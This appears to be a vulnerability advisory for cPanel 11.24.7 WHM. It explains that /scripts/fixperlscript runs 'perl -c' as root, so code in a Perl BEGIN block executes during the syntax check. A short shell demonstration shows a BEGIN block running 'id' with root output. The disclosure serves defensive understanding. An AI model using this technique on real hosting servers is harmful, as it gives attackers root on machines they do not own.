cPanel 11.24.7-BETA_34914 - /scripts/fixperlscript runs 'perl -c' as root, allowing for code execution via BEGIN blocks



DESCRIPTION


WHM contains a feature for the root user that checks the syntax of a specified perl script to ensure there are no errors. It does this by passing the '-c' option to the perl binary. Any perl code contained within BEGIN blocks is executed when perl -c is ran. Thus, since this feature failed to drop privileges, a malicious individual could request their webhost to click the link in WHM to check their (trojaned) perl script, completely compromising the local machine.



IMPACT


Full system compromise.


Running perl -c on code without a BEGIN block:

[root@host ~]# cat test.pl
#!/usr/bin/perl
system("/usr/bin/id > /home/user/id.out");
[root@host ~]# perl -c test.pl ; cat /home/user/id.out
test.pl syntax OK
cat: /home/user/id.out: No such file or directory


Running perl -c on code with a BEGIN block:

[root@host ~]# cat test.pl
#!/usr/bin/perl
BEGIN { system("/usr/bin/id > /home/user/id.out"); }
[root@host ~]# perl -c test.pl ; cat /home/user/id.out
test.pl syntax OK
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)